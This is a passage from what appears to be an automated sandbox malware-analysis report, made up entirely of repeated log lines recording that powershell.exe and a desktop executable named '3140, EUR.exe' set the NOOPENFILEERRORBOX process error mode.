                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
